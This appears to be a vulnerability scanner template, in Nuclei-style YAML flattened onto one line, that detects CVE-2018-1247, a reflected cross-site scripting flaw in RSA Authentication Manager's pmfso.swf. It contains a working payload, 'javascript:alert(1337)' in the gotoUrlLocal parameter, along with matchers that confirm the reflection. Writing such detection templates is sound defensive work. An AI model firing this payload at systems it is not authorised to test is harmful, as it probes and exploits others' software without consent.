id: CVE-2018-1247 info: name: RSA Authentication Manager XSS author: madrobot severity: medium tags: cve,cve2018,xss,flash requests: - method: GET path: - "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//" matchers-condition: and matchers: - type: word words: - "application/x-shockwave-flash" part: header - type: word words: - "javascript:alert(1337)" part: body